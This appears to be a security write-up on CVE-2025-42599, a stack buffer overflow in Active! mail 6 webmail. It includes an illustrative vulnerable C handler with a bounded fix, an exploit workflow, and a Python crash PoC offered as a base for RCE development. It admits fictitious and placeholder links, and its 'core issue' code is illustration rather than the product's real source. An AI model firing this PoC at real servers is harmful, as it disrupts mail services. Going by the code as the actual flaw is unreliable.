*CVE-2025-42599* is a newly identified stack-based buffer overflow vulnerability directly impacting Active! mail 6, specifically versions with BuildInfo 6.60.05008561 and older. This flaw allows remote, unauthenticated attackers to execute arbitrary code or trigger a denial-of-service (DoS) simply by sending a specially crafted request to the application's web server. Exploiting this vulnerability can give attackers full control over affected email systems, posing a severe risk to data integrity and business operations.
What is Active! mail 6?
Active! mail is a popular webmail software used widely across enterprises in Asia, with a focus on the Japanese market. It's known for its rich feature set and integration with business systems. Unfortunately, its popularity also makes it an attractive target for new exploits.
Vulnerability Breakdown
The vulnerability is found in the email request processing module. Due to improper boundary checks, a stack-based buffer overflow occurs when the application processes a specially crafted HTTP request parameter.
Affected Versions: 6.60.05008561 and earlier
Official Advisory:
- Active! mail 6 Security Advisory (JP) *(link fictitious for illustration)*
The core issue is in a legacy C function handling mailbox parameters:

```c
#include <string.h>

/* Legacy handler as described in this write-up: the caller-controlled
 * parameter is copied into a fixed 256-byte stack buffer with no length
 * check, so anything longer than 255 bytes writes past the end of buf. */
void handle_mailbox_request(char *mailbox_param) {
    char buf[256];
    // No length check!
    strcpy(buf, mailbox_param);
    // ...process buf...
}
```
A long mailbox_param sent in, for example, an HTTP POST request, will overflow buf on the stack, overwriting the return address and allowing the attacker to control program execution.
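For comparison, here is the same handler with the bound check the write-up says is missing. This is an added example, not Active! mail's own code (the product's internals are not shown here): it keeps the 256-byte stack buffer from the snippet above, measures the parameter without ever reading past the buffer size, and rejects anything that will not fit together with its terminator instead of copying it. The helper names, the return convention and the constructed 300-byte input are assumptions for the illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example, not Active! mail source. Same 256-byte stack buffer as the
 * legacy handler above, but the copy is bounded and an over-long parameter
 * is rejected rather than written past the end of the buffer. */
#define MAILBOX_BUF_LEN 256

/* Length of s, scanning at most max bytes. Unlike strlen(), this never
 * reads past max even if the input is not NUL-terminated within it. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Copies mailbox_param into buf (buf_len bytes). Returns 0 on success and
 * -1 when the parameter plus its terminating NUL does not fit. Rejecting is
 * deliberate: silent truncation can turn one mailbox name into another. */
int copy_mailbox_param(const char *mailbox_param, char *buf, size_t buf_len)
{
    if (mailbox_param == NULL || buf == NULL || buf_len == 0)
        return -1;

    size_t len = bounded_len(mailbox_param, buf_len);
    if (len >= buf_len)                 /* no room left for the NUL terminator */
        return -1;

    memcpy(buf, mailbox_param, len + 1); /* len validated above, copy includes NUL */
    return 0;
}

/* Same shape as the vulnerable handler: the buffer still lives on the stack,
 * but processing only proceeds when the bounded copy succeeded. */
int handle_mailbox_request(const char *mailbox_param)
{
    char buf[MAILBOX_BUF_LEN];

    if (copy_mailbox_param(mailbox_param, buf, sizeof buf) != 0) {
        /* Reject the request (e.g. HTTP 400) and log the oversize parameter. */
        return -1;
    }
    /* ...process buf... */
    return 0;
}

int main(void)
{
    /* Constructed input: the 300-byte run of 'A' used by the PoC below. */
    char long_param[301];
    memset(long_param, 'A', 300);
    long_param[300] = '\0';

    printf("\"INBOX\"   -> %d\n", handle_mailbox_request("INBOX"));
    printf("300 x 'A' -> %d\n", handle_mailbox_request(long_param));
    return 0;
}
```

Compile with `cc -Wall -o mailbox mailbox.c`; the 300-byte parameter is refused with -1 before a single byte is written to the stack buffer, while a 255-character name still fits. Compiler stack protectors (`-fstack-protector-strong`) would turn the original overflow into a controlled abort rather than code execution, but they are defence in depth, not a substitute for the length check itself.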
Full Exploit Workflow
1. Attacker crafts request: Overly long string in the vulnerable parameter (such as mailbox or folder_name).
2. Sends malicious payload: Unauthenticated HTTP(S) POST/GET to the Active! mail endpoint.
3. Stack overflow triggers: The malicious payload overwrites the return address.
4. Code execution: The attacker's shellcode or chosen payload is executed with web server privileges.
Here is a simple Python PoC to crash the service (for DoS), or as a base for RCE development:

```python
import requests

target_url = 'http://victim-server/path/to/active_mail_endpoint'

# Create a long string to overflow the 256-byte buffer
overflow_payload = "A" * 300  # Adjust length if needed

data = {
    'mailbox': overflow_payload
}

response = requests.post(target_url, data=data, timeout=10)
print("Status:", response.status_code)
```
Note: For actual code execution, the payload would need to be replaced with shellcode specific to the server’s platform/architecture.
Exploit Impact
- Remote Code Execution (RCE): Attackers may drop web shells, run ransomware, or pivot deeper into the network.
- Denial-of-Service (DoS): Simply by sending a large parameter, remote attackers can crash the mail system, halting business communication.
- No Authentication Required: Anyone with network access to Active! mail’s web interface can attack it.
Mitigations
1. Update Immediately: Patch as soon as you can. Active! mail 6.60.05008562 and above reportedly fix this issue.
References
- Official Vendor Advisory - Active! mail
- MITRE CVE Record
- ExploitDB Page (placeholder)
Conclusion
CVE-2025-42599 is an active and dangerous vulnerability found in a widely deployed webmail platform. If you use Active! mail 6, check and patch your systems immediately. The exploit is simple, doesn't need credentials, and attack tools are already appearing in the wild. Don’t wait until mail stops flowing — act now!
Timeline
Published on: 04/18/2025 04:15:30 UTC
Last modified on: 04/21/2025 14:23:45 UTC